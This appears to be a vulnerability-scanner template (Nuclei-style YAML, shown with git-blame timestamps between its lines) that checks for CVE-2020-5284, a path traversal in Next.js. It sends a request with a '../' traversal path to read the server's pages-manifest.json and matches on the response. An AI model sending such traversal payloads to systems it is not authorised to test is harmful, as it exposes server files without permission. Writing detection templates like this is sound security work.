2020-09-15 19:25:55 +00:00
|
|
|
id: cve-2020-5284
|
2020-04-05 18:24:33 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Next.js .next/ limited path traversal
|
2020-08-24 04:34:40 +00:00
|
|
|
author: Harsh & Rahul & dwisiswant0
|
2020-04-05 18:24:33 +00:00
|
|
|
severity: medium
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
|
2020-07-08 08:45:18 +00:00
|
|
|
matchers-condition: and
|
2020-04-05 18:24:33 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- '\{"/_app":".*?_app\.js"'
|
2020-08-24 04:34:40 +00:00
|
|
|
part: body
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
part: header
|
2020-04-05 18:24:33 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|